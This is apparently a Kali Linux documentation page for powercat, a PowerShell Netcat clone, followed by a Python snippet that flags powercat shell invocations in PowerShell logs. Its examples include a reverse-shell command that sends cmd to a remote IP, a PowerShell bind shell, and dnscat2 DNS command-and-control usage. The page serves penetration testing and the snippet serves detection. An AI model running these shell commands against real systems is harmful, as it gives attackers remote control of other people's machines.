
powercat

Powercat is a PowerShell version of Netcat that reads and writes data across network connections over TCP, UDP, or DNS. It implements Netcat's features with extras such as built-in relays, PowerShell execution, and a dnscat2 client.

Description

Powercat provides Netcat functionality within PowerShell v2, enabling network data transfer over TCP, UDP, or DNS. It is a simple utility for creating connections, listening for incoming connections, and executing processes remotely. The tool is particularly useful in penetration testing for establishing reverse shells or bind shells on Windows systems via PowerShell.

Use cases include client-side attacks and obtaining code execution, as covered in OffSec's PEN-200 training modules on leveraging Microsoft Word macros and Windows library files. It supports verbose output for debugging and integrates with dnscat2 for DNS-based command and control.

The script originates from a GitHub repository and is packaged for Kali Linux; the package depends on kali-defaults.

How It Works

Powercat emulates Netcat in PowerShell, handling TCP and UDP connections for data streaming between client and listener modes. In client mode (-c) it connects to the specified IP and port, or, with -dns, sends queries to the specified DNS server. Listener mode (-l) binds to a port (-p) and accepts incoming connections. On connection it can execute a process (-e), and it supports DNS tunnelling via the dnscat2 client as well as additional features such as relays. Data is read and written bidirectionally across all supported protocols.

Installation

sudo apt install powercat

Flags

-c <ip>     Client Mode. Provide the IP of the system you wish to connect to. If you are using -dns, specify the DNS server to send queries to.
-l          Listen Mode. Start a listener on the port specified by -p.
-p <port>   Port. The port to connect to, or the port to listen on.
-e <proc>   Execute. Specify the name of the process to start.
-v          Enable verbosity.
-h          Print this help message.

Examples

Listen on port 8000 and print the output to the console.
powercat -l -p 8000

Connect to 10.1.1.1 port 443, send a shell, and enable verbosity.
powercat -c 10.1.1.1 -p 443 -e cmd -v

Print this help message.
powercat -h

Connect to the dnscat2 server and send DNS queries to the DNS server on 10.1.1.1 port 53.
powercat -c 10.1.1.1 -p 53 -dns

Listen on port 4444 and execute PowerShell on connection.
powercat -l -p 4444 -e powershell

Connect to example.com port 443 with verbosity enabled.
powercat -c example.com -p 443 -v
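As an added defender-side example (not part of the Kali page or the powercat project), the following Python parses the flag syntax documented above out of PowerShell script-block log lines and labels each invocation with the behaviour the page describes: listener, client, bind shell (-l with -e), reverse shell (-c with -e), or dnscat2 tunnel (-dns). The "4104 ScriptBlockText:" log format and the sample lines are constructed assumptions, not real telemetry.

```python
import re
# Option names taken from the powercat flag list on this page.
VALUE_FLAGS = {"-c": "target", "-p": "port", "-e": "exec"}
BOOL_FLAGS = {"-l": "listen", "-dns": "dns", "-v": "verbose", "-h": "help"}
POWERCAT_TOKEN = re.compile(r"(?:.*[\\/])?powercat(?:\.ps1)?", re.IGNORECASE)

def parse_powercat(cmdline: str) -> "dict | None":
    """Parse a powercat invocation; return None if the line is not one."""
    tokens = cmdline.split()
    idx = next((i for i, t in enumerate(tokens) if POWERCAT_TOKEN.fullmatch(t)), None)
    if idx is None:
        return None
    opts = {**dict.fromkeys(VALUE_FLAGS.values()), **dict.fromkeys(BOOL_FLAGS.values(), False)}
    i = idx + 1
    while i < len(tokens):
        tok = tokens[i].lower()
        if tok in VALUE_FLAGS and i + 1 < len(tokens):
            opts[VALUE_FLAGS[tok]] = tokens[i + 1]
            i += 1  # consume the flag's value
        elif tok in BOOL_FLAGS:
            opts[BOOL_FLAGS[tok]] = True
        i += 1
    return opts

def classify(opts: dict) -> str:
    """Map parsed options onto the behaviours the page describes."""
    if opts["help"]:
        return "help"
    if opts["exec"]:
        # -e attaches a process to the connection: bind shell with -l, reverse shell with -c
        return "bind-shell" if opts["listen"] else "reverse-shell"
    if opts["dns"]:
        return "dns-tunnel"  # dnscat2 client mode; -c names the DNS server
    return "listener" if opts["listen"] else "client"

SAMPLE_LOGS = [  # constructed sample script-block log lines, not real telemetry
    "4104 ScriptBlockText: powercat -l -p 8000",
    "4104 ScriptBlockText: powercat -c 10.1.1.1 -p 443 -e cmd -v",
    "4104 ScriptBlockText: powercat -c 10.1.1.1 -p 53 -dns",
    "4104 ScriptBlockText: Get-Process | Where-Object CPU -gt 100",
]

def triage(lines):
    """Return (behaviour, target, port, exec) for every powercat invocation found."""
    findings = []
    for line in lines:
        opts = parse_powercat(line.split("ScriptBlockText:", 1)[-1])
        if opts is not None:
            findings.append((classify(opts), opts["target"], opts["port"], opts["exec"]))
    return findings
```

Running triage over the constructed lines yields three findings and skips the unrelated Get-Process line; the -e hits are the ones worth escalating first.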
Updated 2026-04-16 (kali.org)